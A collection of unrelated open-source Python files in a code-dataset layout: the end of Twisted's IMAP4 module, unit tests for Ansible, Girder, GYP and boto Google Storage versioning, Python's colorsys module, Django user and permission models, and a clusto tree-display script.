self.pending_body.partialBegin = begin
self.pending_body.partialLength = length
return end + 1
class FileProducer:
CHUNK_SIZE = 2 ** 2 ** 2 ** 2
firstWrite = True
def __init__(self, f):
self.f = f
def beginProducing(self, consumer):
self.consumer = consumer
self.produce = consumer.write
d = self._onDone = defer.Deferred()
self.consumer.registerProducer(self, False)
return d
def resumeProducing(self):
b = ''
if self.firstWrite:
b = '{%d}\r\n' % self._size()
self.firstWrite = False
if not self.f:
return
b = b + self.f.read(self.CHUNK_SIZE)
if not b:
self.consumer.unregisterProducer()
self._onDone.callback(self)
self._onDone = self.f = self.consumer = None
else:
self.produce(b)
def pauseProducing(self):
pass
def stopProducing(self):
pass
def _size(self):
b = self.f.tell()
self.f.seek(0, 2)
e = self.f.tell()
self.f.seek(b, 0)
return e - b
def parseTime(s):
# XXX - This may require localization :(
months = [
'jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul', 'aug', 'sep', 'oct',
'nov', 'dec', 'january', 'february', 'march', 'april', 'may', 'june',
'july', 'august', 'september', 'october', 'november', 'december'
]
expr = {
'day': r"(?P<day>3[0-1]|[1-2]\d|0[1-9]|[1-9]| [1-9])",
'mon': r"(?P<mon>\w+)",
'year': r"(?P<year>\d\d\d\d)"
}
m = re.match('%(day)s-%(mon)s-%(year)s' % expr, s)
if not m:
raise ValueError, "Cannot parse time string %r" % (s,)
d = m.groupdict()
try:
d['mon'] = 1 + (months.index(d['mon'].lower()) % 12)
d['year'] = int(d['year'])
d['day'] = int(d['day'])
except ValueError:
raise ValueError, "Cannot parse time string %r" % (s,)
else:
return time.struct_time(
(d['year'], d['mon'], d['day'], 0, 0, 0, -1, -1, -1)
)
import codecs
def modified_base64(s):
s_utf7 = s.encode('utf-7')
return s_utf7[1:-1].replace('/', ',')
def modified_unbase64(s):
s_utf7 = '+' + s.replace(',', '/') + '-'
return s_utf7.decode('utf-7')
def encoder(s, errors=None):
"""
Encode the given C{unicode} string using the IMAP4 specific variation of
UTF-7.
@type s: C{unicode}
@param s: The text to encode.
@param errors: Policy for handling encoding errors. Currently ignored.
@return: C{tuple} of a C{str} giving the encoded bytes and an C{int}
giving the number of code units consumed from the input.
"""
r = []
_in = []
for c in s:
if ord(c) in (range(0x20, 0x26) + range(0x27, 0x7f)):
if _in:
r.extend(['&', modified_base64(''.join(_in)), '-'])
del _in[:]
r.append(str(c))
elif c == '&':
if _in:
r.extend(['&', modified_base64(''.join(_in)), '-'])
del _in[:]
r.append('&-')
else:
_in.append(c)
if _in:
r.extend(['&', modified_base64(''.join(_in)), '-'])
return (''.join(r), len(s))
def decoder(s, errors=None):
"""
Decode the given C{str} using the IMAP4 specific variation of UTF-7.
@type s: C{str}
@param s: The bytes to decode.
@param errors: Policy for handling decoding errors. Currently ignored.
@return: a C{tuple} of a C{unicode} string giving the text which was
decoded and an C{int} giving the number of bytes consumed from the
input.
"""
r = []
decode = []
for c in s:
if c == '&' and not decode:
decode.append('&')
elif c == '-' and decode:
if len(decode) == 1:
r.append('&')
else:
r.append(modified_unbase64(''.join(decode[1:])))
decode = []
elif decode:
decode.append(c)
else:
r.append(c)
if decode:
r.append(modified_unbase64(''.join(decode[1:])))
return (''.join(r), len(s))
class StreamReader(codecs.StreamReader):
def decode(self, s, errors='strict'):
return decoder(s)
class StreamWriter(codecs.StreamWriter):
def encode(self, s, errors='strict'):
return encoder(s)
_codecInfo = (encoder, decoder, StreamReader, StreamWriter)
try:
_codecInfoClass = codecs.CodecInfo
except AttributeError:
pass
else:
_codecInfo = _codecInfoClass(*_codecInfo)
def imap4_utf_7(name):
if name == 'imap4-utf-7':
return _codecInfo
codecs.register(imap4_utf_7)
__all__ = [
# Protocol classes
'IMAP4Server', 'IMAP4Client',
# Interfaces
'IMailboxListener', 'IClientAuthentication', 'IAccount', 'IMailbox',
'INamespacePresenter', 'ICloseableMailbox', 'IMailboxInfo',
'IMessage', 'IMessageCopier', 'IMessageFile', 'ISearchableMailbox',
# Exceptions
'IMAP4Exception', 'IllegalClientResponse', 'IllegalOperation',
'IllegalMailboxEncoding', 'UnhandledResponse', 'NegativeResponse',
'NoSupportedAuthentication', 'IllegalServerResponse',
'IllegalIdentifierError', 'IllegalQueryError', 'MismatchedNesting',
'MismatchedQuoting', 'MailboxException', 'MailboxCollision',
'NoSuchMailbox', 'ReadOnlyMailbox',
# Auth objects
'CramMD5ClientAuthenticator', 'PLAINAuthenticator', 'LOGINAuthenticator',
'PLAINCredentials', 'LOGINCredentials',
# Simple query interface
'Query', 'Not', 'Or',
# Miscellaneous
'MemoryAccount',
'statusRequestHelper',
]
| apache-2.0 |
quinot/ansible | test/units/modules/network/junos/test_junos_scp.py | 48 | 3579 | # (c) 2018 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.compat.tests.mock import patch, MagicMock
from units.modules.utils import set_module_args
from .junos_module import TestJunosModule
jnpr_mock = MagicMock()
scp_mock = MagicMock()
modules = {
'jnpr': jnpr_mock,
'jnpr.junos': jnpr_mock.junos,
'jnpr.junos.utils': jnpr_mock.junos.utils,
'jnpr.junos.utils.scp': jnpr_mock.junos.utils.scp,
'jnpr.junos.exception': jnpr_mock.junos.execption
}
module_patcher = patch.dict('sys.modules', modules)
module_patcher.start()
jnpr_mock.junos.utils.scp.SCP().__enter__.return_value = scp_mock
from ansible.modules.network.junos import junos_scp
class TestJunosCommandModule(TestJunosModule):
module = junos_scp
def setUp(self):
super(TestJunosCommandModule, self).setUp()
def tearDown(self):
super(TestJunosCommandModule, self).tearDown()
def test_junos_scp_src(self):
set_module_args(dict(src='test.txt'))
result = self.execute_module(changed=True)
args, kwargs = scp_mock.put.call_args
self.assertEqual(args[0], 'test.txt')
self.assertEqual(result['changed'], True)
def test_junos_scp_src_fail(self):
scp_mock.put.side_effect = OSError("[Errno 2] No such file or directory: 'text.txt'")
set_module_args(dict(src='test.txt'))
result = self.execute_module(changed=True, failed=True)
self.assertEqual(result['msg'], "[Errno 2] No such file or directory: 'text.txt'")
def test_junos_scp_remote_src(self):
set_module_args(dict(src='test.txt', remote_src=True))
result = self.execute_module(changed=True)
args, kwargs = scp_mock.get.call_args
self.assertEqual(args[0], 'test.txt')
self.assertEqual(result['changed'], True)
def test_junos_scp_all(self):
set_module_args(dict(src='test', remote_src=True, dest="tmp", recursive=True))
result = self.execute_module(changed=True)
args, kwargs = scp_mock.get.call_args
self.assertEqual(args[0], 'test')
self.assertEqual(kwargs['local_path'], 'tmp')
self.assertEqual(kwargs['recursive'], True)
self.assertEqual(result['changed'], True)
def test_junos_scp_device_param(self):
set_module_args(dict(src='test.txt',
provider={'username': 'unit', 'host': 'test', 'ssh_keyfile': 'path',
'password': 'test', 'port': 234}))
self.execute_module(changed=True)
args, kwargs = jnpr_mock.junos.Device.call_args
self.assertEqual(args[0], 'test')
self.assertEqual(kwargs['passwd'], 'test')
self.assertEqual(kwargs['ssh_private_key_file'], 'path')
self.assertEqual(kwargs['port'], 234)
self.assertEqual(kwargs['user'], 'unit')
| gpl-3.0 |
data-exp-lab/girder | tests/cases/rest_decorator_test.py | 2 | 4358 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import json
import mock
import os
import requests
from .. import base
from girder import config
from girder.api.rest import endpoint
from girder.models.user import User
def setUpModule():
os.environ['GIRDER_PORT'] = os.environ.get('GIRDER_TEST_PORT', '20200')
config.loadConfig()
testPluginPath = os.path.normpath(os.path.join(
os.path.dirname(os.path.abspath(__file__)), '..', '..', 'test', 'test_plugins'
))
base.mockPluginDir(testPluginPath)
base.enabledPlugins = ['test_plugin']
with mock.patch('girder.utility.plugin_utilities.logprint.exception'):
base.startServer(mock=False)
def tearDownModule():
base.stopServer()
class TestEndpointDecoratorException(base.TestCase):
"""Tests the endpoint decorator exception handling."""
def setUp(self):
with mock.patch('girder.utility.plugin_utilities.logprint.exception'):
super(TestEndpointDecoratorException, self).setUp()
@endpoint
def pointlessEndpointAscii(self, path, params):
raise Exception('You did something wrong.')
@endpoint
def pointlessEndpointUnicode(self, path, params):
raise Exception(u'\u0400 cannot be converted to ascii.')
@endpoint
def pointlessEndpointBytes(self, path, params):
raise Exception('\x80\x80 cannot be converted to unicode or ascii.')
def testEndpointExceptionAscii(self):
resp = self.pointlessEndpointAscii('', {}).decode()
obj = json.loads(resp)
self.assertEqual(obj['type'], 'internal')
def testEndpointExceptionUnicode(self):
resp = self.pointlessEndpointUnicode('', {}).decode('utf8')
obj = json.loads(resp)
self.assertEqual(obj['type'], 'internal')
def testEndpointExceptionBytes(self):
resp = self.pointlessEndpointBytes('', {}).decode('utf8')
obj = json.loads(resp)
self.assertEqual(obj['type'], 'internal')
def testBoundHandlerDecorator(self):
user = User().createUser('tester', 'password', 'Test', 'User', 'test@test.com')
resp = self.request('/collection/unbound/default/noargs', user=user, params={
'val': False
})
self.assertStatusOk(resp)
self.assertEqual(resp.json, True)
resp = self.request('/collection/unbound/default', user=user, params={
'val': False
})
self.assertStatusOk(resp)
self.assertEqual(resp.json, True)
resp = self.request('/collection/unbound/explicit', user=user)
self.assertStatusOk(resp)
self.assertEqual(resp.json, {
'name': 'collection',
'userLogin': 'tester'
})
def testRawResponse(self):
resp = self.request('/other/rawWithDecorator', isJson=False)
self.assertStatusOk(resp)
self.assertEqual(self.getBody(resp), 'this is a raw response')
resp = self.request('/other/rawInternal', isJson=False)
self.assertStatusOk(resp)
self.assertEqual(self.getBody(resp), 'this is also a raw response')
# We must make an actual request in order to test response encoding
# at the WSGI server layer.
resp = requests.get(
'http://127.0.0.1:%s/api/v1/other/rawReturningText' % os.environ['GIRDER_TEST_PORT'])
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.headers['Content-Type'], 'text/plain;charset=utf-8')
self.assertEqual(resp.content, b'this is not encoded \xf0\x9f\x91\x8d')
self.assertEqual(resp.text, u'this is not encoded \U0001F44D')
| apache-2.0 |
40223136/2015cdag1man | static/Brython3.1.3-20150514-095342/Lib/colorsys.py | 1066 | 3691 | """Conversion functions between RGB and other color systems.
This modules provides two functions for each color system ABC:
rgb_to_abc(r, g, b) --> a, b, c
abc_to_rgb(a, b, c) --> r, g, b
All inputs and outputs are triples of floats in the range [0.0...1.0]
(with the exception of I and Q, which covers a slightly larger range).
Inputs outside the valid range may cause exceptions or invalid outputs.
Supported color systems:
RGB: Red, Green, Blue components
YIQ: Luminance, Chrominance (used by composite video signals)
HLS: Hue, Luminance, Saturation
HSV: Hue, Saturation, Value
"""
# References:
# http://en.wikipedia.org/wiki/YIQ
# http://en.wikipedia.org/wiki/HLS_color_space
# http://en.wikipedia.org/wiki/HSV_color_space
__all__ = ["rgb_to_yiq","yiq_to_rgb","rgb_to_hls","hls_to_rgb",
"rgb_to_hsv","hsv_to_rgb"]
# Some floating point constants
ONE_THIRD = 1.0/3.0
ONE_SIXTH = 1.0/6.0
TWO_THIRD = 2.0/3.0
# YIQ: used by composite video signals (linear combinations of RGB)
# Y: perceived grey level (0.0 == black, 1.0 == white)
# I, Q: color components
def rgb_to_yiq(r, g, b):
y = 0.30*r + 0.59*g + 0.11*b
i = 0.60*r - 0.28*g - 0.32*b
q = 0.21*r - 0.52*g + 0.31*b
return (y, i, q)
def yiq_to_rgb(y, i, q):
r = y + 0.948262*i + 0.624013*q
g = y - 0.276066*i - 0.639810*q
b = y - 1.105450*i + 1.729860*q
if r < 0.0:
r = 0.0
if g < 0.0:
g = 0.0
if b < 0.0:
b = 0.0
if r > 1.0:
r = 1.0
if g > 1.0:
g = 1.0
if b > 1.0:
b = 1.0
return (r, g, b)
# HLS: Hue, Luminance, Saturation
# H: position in the spectrum
# L: color lightness
# S: color saturation
def rgb_to_hls(r, g, b):
maxc = max(r, g, b)
minc = min(r, g, b)
# XXX Can optimize (maxc+minc) and (maxc-minc)
l = (minc+maxc)/2.0
if minc == maxc:
return 0.0, l, 0.0
if l <= 0.5:
s = (maxc-minc) / (maxc+minc)
else:
s = (maxc-minc) / (2.0-maxc-minc)
rc = (maxc-r) / (maxc-minc)
gc = (maxc-g) / (maxc-minc)
bc = (maxc-b) / (maxc-minc)
if r == maxc:
h = bc-gc
elif g == maxc:
h = 2.0+rc-bc
else:
h = 4.0+gc-rc
h = (h/6.0) % 1.0
return h, l, s
def hls_to_rgb(h, l, s):
if s == 0.0:
return l, l, l
if l <= 0.5:
m2 = l * (1.0+s)
else:
m2 = l+s-(l*s)
m1 = 2.0*l - m2
return (_v(m1, m2, h+ONE_THIRD), _v(m1, m2, h), _v(m1, m2, h-ONE_THIRD))
def _v(m1, m2, hue):
hue = hue % 1.0
if hue < ONE_SIXTH:
return m1 + (m2-m1)*hue*6.0
if hue < 0.5:
return m2
if hue < TWO_THIRD:
return m1 + (m2-m1)*(TWO_THIRD-hue)*6.0
return m1
# HSV: Hue, Saturation, Value
# H: position in the spectrum
# S: color saturation ("purity")
# V: color brightness
def rgb_to_hsv(r, g, b):
maxc = max(r, g, b)
minc = min(r, g, b)
v = maxc
if minc == maxc:
return 0.0, 0.0, v
s = (maxc-minc) / maxc
rc = (maxc-r) / (maxc-minc)
gc = (maxc-g) / (maxc-minc)
bc = (maxc-b) / (maxc-minc)
if r == maxc:
h = bc-gc
elif g == maxc:
h = 2.0+rc-bc
else:
h = 4.0+gc-rc
h = (h/6.0) % 1.0
return h, s, v
def hsv_to_rgb(h, s, v):
if s == 0.0:
return v, v, v
i = int(h*6.0) # XXX assume int() truncates!
f = (h*6.0) - i
p = v*(1.0 - s)
q = v*(1.0 - s*f)
t = v*(1.0 - s*(1.0-f))
i = i%6
if i == 0:
return v, t, p
if i == 1:
return q, v, p
if i == 2:
return p, v, t
if i == 3:
return p, q, v
if i == 4:
return t, p, v
if i == 5:
return v, p, q
# Cannot get here
| gpl-3.0 |
AlexeyBerezhnoy/lucas | account/models.py | 2 | 4943 | from django.db import models
from django.contrib.auth.models import BaseUserManager, AbstractBaseUser, PermissionsMixin, Permission
from account.validator import validate_name, validate_profession, validate_experience
CATEGORIES = ['A', 'A1', 'B', 'B1', 'BE', 'C', 'C1', 'CE', 'C1E', 'D', 'D1', 'DE', 'D1E', 'M', 'Tm', 'Tb']
class ModeratorManager(BaseUserManager):
def create_moderator(self, email, last_name, first_name, middle_name, password):
user = self.model(email=self.normalize_email(email),
last_name=last_name,
first_name=first_name,
middle_name=middle_name)
user.is_admin = True
user.save()
user.user_permissions.add(Permission.objects.get(codename='manipulate_expert'))
user.set_password(password)
user.save()
return user
def get_queryset(self):
return super(BaseUserManager, self).get_queryset().filter(is_admin=True)
class ExpertManager(BaseUserManager):
def create_expert(self, email, last_name, first_name, middle_name,
profession, professional_experience, position,
driver_license, driving_experience):
user = self.model(email=email, last_name=last_name, first_name=first_name, middle_name=middle_name,
profession=profession, professional_experience=professional_experience, position=position,
driver_license=driver_license, driving_experience=driving_experience)
user.save()
return user
def get_queryset(self):
return super(BaseUserManager, self).get_queryset().filter(is_expert=True)
class User(AbstractBaseUser, PermissionsMixin):
email = models.EmailField("email",
unique=True)
last_name = models.CharField("фамилия",
max_length=30,
validators=[validate_name])
first_name = models.CharField("имя",
max_length=30,
validators=[validate_name])
middle_name = models.CharField("отчество",
max_length=30,
validators=[validate_name])
profession = models.CharField("профессия",
max_length=30,
blank=True,
validators=[validate_profession])
position = models.CharField("должность",
max_length=30,
blank=True,
validators=[validate_profession])
professional_experience = models.PositiveSmallIntegerField("опыт работы",
null=True,
validators=[validate_experience])
driver_license = models.CharField("Водительское удостоверение",
max_length=30,
blank=True,
choices=((cat, cat) for cat in CATEGORIES))
driving_experience = models.IntegerField("Водительский стаж",
null=True,
validators=[validate_experience])
is_expert = models.BooleanField(default=False)
is_active = models.BooleanField(default=False)
is_admin = models.BooleanField(default=False)
USERNAME_FIELD = 'email'
objects = BaseUserManager()
def __str__(self):
return self.email
# TODO: лучше использовать нормальную проверку пермишинов
def has_perm(self, perm, obj=None):
p = Permission.objects.get(codename=perm)
if p not in self.user_permissions.all():
return False
return True
def has_perms(self, perm_list, obj=None):
for perm in perm_list:
if not self.has_perm(perm):
return False
return True
class Moderator(User):
objects = ModeratorManager()
class Meta:
proxy = True
def __str__(self):
return self.email
class Expert(User):
objects = ExpertManager()
def save(self, *args, **kwargs):
"""
Запрещает сохранять экспертом поле
водительский стаж без наличия прав
"""
if not self.driver_license:
self.driving_experience = False
self.is_expert = True
super(Expert, self).save(*args, **kwargs)
class Meta:
proxy = True
permissions = (
('manipulate_expert', 'Can create, edit, view and remove expert'),
)
| mit |
clusto/clusto | src/clusto/commands/tree.py | 5 | 4580 | #!/usr/bin/env python
"""Display clusto objects, recursively, with attributes, and/or in color."""
import sys
from itertools import chain
import clusto
from clusto import script_helper
class Colors(object):
"""ANSI color escape sequences class."""
mapping = {'BRIGHT': '\033[1m',
'GREEN': '\033[32m',
'MAGENTA': '\033[35m',
'YELLOW': '\033[33m',
'RESET': '\033[0m'}
def __init__(self, enabled=False):
"""Construct instance with color enabled or disabled."""
# Could default to true if stdout is a tty and not on Windows,
# but for now we don't try to guess.
self.enabled = enabled
def __getattr__(self, name):
"""Return ANSI color escape sequence if color is enabled."""
if self.enabled:
return self.mapping[name]
else:
assert name in self.mapping
return ''
class Tree(script_helper.Script):
"""
Display clusto objects, recursively, with attributes, and/or in color.
This script queries for a specified clusto object and attributes and
optionally also queries parent or contained objects, recursively.
It displays a simple, human-readable indented tree, with different
colors for clusto keys, subkeys, and values if color is enabled.
"""
def print_obj(self, obj, attrs, indent=0, color=False):
"""Print indented object, optionally with attributes or in color."""
colors = Colors(enabled=color)
indent_txt = "\t" * indent
# Clusto object name.
txt = "{indent}* {name}".format(
indent=indent_txt,
name=colors.BRIGHT + obj.name + colors.RESET)
# Clusto object attributes.
if 'ALL' in attrs:
attributes = obj.attrs()
else:
attributes = chain.from_iterable(obj.attrs(attr)
for attr in attrs)
for x in attributes:
if x.subkey:
subkey_txt = ".{subkey}".format(
subkey=colors.MAGENTA + str(x.subkey) + colors.RESET
)
else:
subkey_txt = ""
txt += "\n{indent}| {key}{subkey} = {value}".format(
indent=indent_txt,
key=colors.GREEN + str(x.key) + colors.RESET,
subkey=subkey_txt,
value=colors.YELLOW + str(x.value) + colors.RESET
)
print(txt)
def print_tree(self, root, attrs, direction, indent=0, color=False):
"""Print parent or contained object attributes, recursively."""
# Alternatively, we could call obj.attrs(merge_container_attrs=True),
# and use the entity attribute of each clusto attribute to
# recreate the tree.
for parent in getattr(root, direction)():
self.print_obj(parent, attrs, indent=indent, color=color)
self.print_tree(parent, attrs, direction, indent=indent + 1,
color=color)
def run(self, args):
"""Execute script, passing script arguments to methods."""
obj = clusto.get_by_name(args.obj)
attrs = args.attrs
self.print_obj(obj, attrs, indent=0, color=args.color)
if args.parents or args.contents:
if args.parents:
direction = 'parents'
else:
direction = 'contents'
self.print_tree(obj, attrs, direction, indent=1,
color=args.color)
def _add_arguments(self, parser):
parser.add_argument('obj', metavar='object', help="clusto object")
parser.add_argument('attrs', metavar='attributes', nargs='*',
help="clusto attribute keys, ALL for all")
direction = parser.add_mutually_exclusive_group()
direction.add_argument('-p', '--parents', action='store_true',
default=False,
help="query parent objects, recursively")
direction.add_argument('-c', '--contents', action='store_true',
default=False,
help="query contained objects, recursively")
parser.add_argument('-C', '--color', action='store_true',
default=False, help="enable color output")
def main():
"""Execute script with clusto script_helper."""
attr, args = script_helper.init_arguments(Tree)
return attr.run(args)
if __name__ == '__main__':
sys.exit(main())
| bsd-3-clause |
Samsung/skia | third_party/externals/gyp/test/msvs/missing_sources/gyptest-missing.py | 315 | 1413 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that missing 'sources' files are treated as fatal errors when the
the generator flag 'msvs_error_on_missing_sources' is set.
"""
import TestGyp
import os
import sys
if sys.platform == 'win32':
test = TestGyp.TestGyp(formats=['msvs', 'ninja'], workdir='workarea_all')
# With the flag not set
test.run_gyp('hello_missing.gyp')
# With the flag explicitly set to 0
try:
os.environ['GYP_GENERATOR_FLAGS'] = 'msvs_error_on_missing_sources=0'
test.run_gyp('hello_missing.gyp')
finally:
del os.environ['GYP_GENERATOR_FLAGS']
# With the flag explicitly set to 1
try:
os.environ['GYP_GENERATOR_FLAGS'] = 'msvs_error_on_missing_sources=1'
# Test to make sure GYP raises an exception (exit status 1). Since this will
# also print a backtrace, ensure that TestGyp is not checking that stderr is
# empty by specifying None, which means do not perform any checking.
# Instead, stderr is checked below to ensure it contains the expected
# output.
test.run_gyp('hello_missing.gyp', status=1, stderr=None)
finally:
del os.environ['GYP_GENERATOR_FLAGS']
test.must_contain_any_line(test.stderr(),
["Missing input files:"])
test.pass_test()
| bsd-3-clause |
palladius/gcloud | packages/gsutil/boto/tests/integration/gs/test_versioning.py | 1 | 9784 | # -*- coding: utf-8 -*-
# Copyright (c) 2012, Google, Inc.
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""Unit tests for GS versioning support."""
from xml import sax
from boto import handler
from boto.gs import acl
from tests.integration.gs.testcase import GSTestCase
class GSVersioningTest(GSTestCase):
def testVersioningToggle(self):
b = self._MakeBucket()
self.assertFalse(b.get_versioning_status())
b.configure_versioning(True)
self.assertTrue(b.get_versioning_status())
b.configure_versioning(False)
self.assertFalse(b.get_versioning_status())
def testDeleteVersionedKey(self):
b = self._MakeVersionedBucket()
k = b.new_key("foo")
s1 = "test1"
k.set_contents_from_string(s1)
k = b.get_key("foo")
g1 = k.generation
s2 = "test2"
k.set_contents_from_string(s2)
k = b.get_key("foo")
g2 = k.generation
versions = list(b.list_versions())
self.assertEqual(len(versions), 2)
self.assertEqual(versions[0].name, "foo")
self.assertEqual(versions[1].name, "foo")
generations = [k.generation for k in versions]
self.assertIn(g1, generations)
self.assertIn(g2, generations)
# Delete "current" version and make sure that version is no longer
# visible from a basic GET call.
k = b.get_key("foo")
k.delete()
self.assertIsNone(b.get_key("foo"))
# Both old versions should still be there when listed using the versions
# query parameter.
versions = list(b.list_versions())
self.assertEqual(len(versions), 2)
self.assertEqual(versions[0].name, "foo")
self.assertEqual(versions[1].name, "foo")
generations = [k.generation for k in versions]
self.assertIn(g1, generations)
self.assertIn(g2, generations)
# Delete generation 2 and make sure it's gone.
b.delete_key("foo", generation=g2)
versions = list(b.list_versions())
self.assertEqual(len(versions), 1)
self.assertEqual(versions[0].name, "foo")
self.assertEqual(versions[0].generation, g1)
# Delete generation 1 and make sure it's gone.
b.delete_key("foo", generation=g1)
versions = list(b.list_versions())
self.assertEqual(len(versions), 0)
def testGetVersionedKey(self):
b = self._MakeVersionedBucket()
k = b.new_key("foo")
s1 = "test1"
k.set_contents_from_string(s1)
k = b.get_key("foo")
g1 = k.generation
o1 = k.get_contents_as_string()
self.assertEqual(o1, s1)
s2 = "test2"
k.set_contents_from_string(s2)
k = b.get_key("foo")
g2 = k.generation
self.assertNotEqual(g2, g1)
o2 = k.get_contents_as_string()
self.assertEqual(o2, s2)
k = b.get_key("foo", generation=g1)
self.assertEqual(k.get_contents_as_string(), s1)
k = b.get_key("foo", generation=g2)
self.assertEqual(k.get_contents_as_string(), s2)
def testVersionedBucketCannedAcl(self):
b = self._MakeVersionedBucket()
k = b.new_key("foo")
s1 = "test1"
k.set_contents_from_string(s1)
k = b.get_key("foo")
g1 = k.generation
s2 = "test2"
k.set_contents_from_string(s2)
k = b.get_key("foo")
g2 = k.generation
acl1g1 = b.get_acl("foo", generation=g1)
acl1g2 = b.get_acl("foo", generation=g2)
owner1g1 = acl1g1.owner.id
owner1g2 = acl1g2.owner.id
self.assertEqual(owner1g1, owner1g2)
entries1g1 = acl1g1.entries.entry_list
entries1g2 = acl1g2.entries.entry_list
self.assertEqual(len(entries1g1), len(entries1g2))
b.set_acl("public-read", key_name="foo", generation=g1)
acl2g1 = b.get_acl("foo", generation=g1)
acl2g2 = b.get_acl("foo", generation=g2)
entries2g1 = acl2g1.entries.entry_list
entries2g2 = acl2g2.entries.entry_list
self.assertEqual(len(entries2g2), len(entries1g2))
public_read_entries1 = [e for e in entries2g1 if e.permission == "READ"
and e.scope.type == acl.ALL_USERS]
public_read_entries2 = [e for e in entries2g2 if e.permission == "READ"
and e.scope.type == acl.ALL_USERS]
self.assertEqual(len(public_read_entries1), 1)
self.assertEqual(len(public_read_entries2), 0)
def testVersionedBucketXmlAcl(self):
b = self._MakeVersionedBucket()
k = b.new_key("foo")
s1 = "test1"
k.set_contents_from_string(s1)
k = b.get_key("foo")
g1 = k.generation
s2 = "test2"
k.set_contents_from_string(s2)
k = b.get_key("foo")
g2 = k.generation
acl1g1 = b.get_acl("foo", generation=g1)
acl1g2 = b.get_acl("foo", generation=g2)
owner1g1 = acl1g1.owner.id
owner1g2 = acl1g2.owner.id
self.assertEqual(owner1g1, owner1g2)
entries1g1 = acl1g1.entries.entry_list
entries1g2 = acl1g2.entries.entry_list
self.assertEqual(len(entries1g1), len(entries1g2))
acl_xml = (
'<ACCESSControlList><EntrIes><Entry>' +
'<Scope type="AllUsers"></Scope><Permission>READ</Permission>' +
'</Entry></EntrIes></ACCESSControlList>')
aclo = acl.ACL()
h = handler.XmlHandler(aclo, b)
sax.parseString(acl_xml, h)
b.set_acl(aclo, key_name="foo", generation=g1)
acl2g1 = b.get_acl("foo", generation=g1)
acl2g2 = b.get_acl("foo", generation=g2)
entries2g1 = acl2g1.entries.entry_list
entries2g2 = acl2g2.entries.entry_list
self.assertEqual(len(entries2g2), len(entries1g2))
public_read_entries1 = [e for e in entries2g1 if e.permission == "READ"
and e.scope.type == acl.ALL_USERS]
public_read_entries2 = [e for e in entries2g2 if e.permission == "READ"
and e.scope.type == acl.ALL_USERS]
self.assertEqual(len(public_read_entries1), 1)
self.assertEqual(len(public_read_entries2), 0)
def testVersionedObjectCannedAcl(self):
b = self._MakeVersionedBucket()
k = b.new_key("foo")
s1 = "test1"
k.set_contents_from_string(s1)
k = b.get_key("foo")
g1 = k.generation
s2 = "test2"
k.set_contents_from_string(s2)
k = b.get_key("foo")
g2 = k.generation
acl1g1 = b.get_acl("foo", generation=g1)
acl1g2 = b.get_acl("foo", generation=g2)
owner1g1 = acl1g1.owner.id
owner1g2 = acl1g2.owner.id
self.assertEqual(owner1g1, owner1g2)
entries1g1 = acl1g1.entries.entry_list
entries1g2 = acl1g2.entries.entry_list
self.assertEqual(len(entries1g1), len(entries1g2))
b.set_acl("public-read", key_name="foo", generation=g1)
acl2g1 = b.get_acl("foo", generation=g1)
acl2g2 = b.get_acl("foo", generation=g2)
entries2g1 = acl2g1.entries.entry_list
entries2g2 = acl2g2.entries.entry_list
self.assertEqual(len(entries2g2), len(entries1g2))
public_read_entries1 = [e for e in entries2g1 if e.permission == "READ"
and e.scope.type == acl.ALL_USERS]
public_read_entries2 = [e for e in entries2g2 if e.permission == "READ"
and e.scope.type == acl.ALL_USERS]
self.assertEqual(len(public_read_entries1), 1)
self.assertEqual(len(public_read_entries2), 0)
def testCopyVersionedKey(self):
b = self._MakeVersionedBucket()
k = b.new_key("foo")
s1 = "test1"
k.set_contents_from_string(s1)
k = b.get_key("foo")
g1 = k.generation
s2 = "test2"
k.set_contents_from_string(s2)
b2 = self._MakeVersionedBucket()
b2.copy_key("foo2", b.name, "foo", src_generation=g1)
k2 = b2.get_key("foo2")
s3 = k2.get_contents_as_string()
self.assertEqual(s3, s1)
def testKeyGenerationUpdatesOnSet(self):
b = self._MakeVersionedBucket()
k = b.new_key("foo")
self.assertIsNone(k.generation)
k.set_contents_from_string("test1")
g1 = k.generation
self.assertRegexpMatches(g1, r'[0-9]+')
self.assertEqual(k.meta_generation, '1')
k.set_contents_from_string("test2")
g2 = k.generation
self.assertNotEqual(g1, g2)
self.assertRegexpMatches(g2, r'[0-9]+')
self.assertGreater(int(g2), int(g1))
self.assertEqual(k.meta_generation, '1')
